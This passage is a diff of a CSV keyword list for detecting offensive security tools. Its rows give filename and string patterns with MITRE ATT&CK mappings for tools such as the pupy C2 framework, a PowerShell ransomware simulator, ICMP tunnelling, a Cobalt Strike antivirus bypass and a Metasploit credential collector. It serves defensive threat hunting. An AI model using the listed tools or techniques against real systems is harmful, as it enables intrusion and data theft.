+"*pspy*psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy32 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy64 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-build:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-development:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-example:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-master*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-testing:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
 "*PSRansom.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z"
 "*PSRecon*","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","5","465","111","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z"
 "*psreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
@@ -15337,43 +15505,44 @@ "*ptunnel-ng-x86-dbg.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*ptunnel-server.log*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*Public\dcinst.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*pupy*/checkvm.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*pupy/payload_*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyCmdLoop*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyCredentials.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyDnsCnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyDnsCommandServerHandler*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*pupygen.py *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyKCPSocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyLoaderTemplate.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyOffloadDNS*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyOffloadSocket*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupySocketStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*PupyVirtualStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupy*/checkvm.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupy/payload_*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyCmdLoop*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyCredentials.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyDnsCnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyDnsCommandServerHandler*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupygen.py *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyKCPSocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyLoaderTemplate.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyOffloadDNS*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyOffloadSocket*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupySocketStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyVirtualStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*pureqh/bypassAV*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pureqh/bypassAV","1","1","N/A","10","10","434","101","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z" -"*purevpn_cred_collector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*purevpn_cred_collector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*purplepanda.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*purplepanda_config.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - 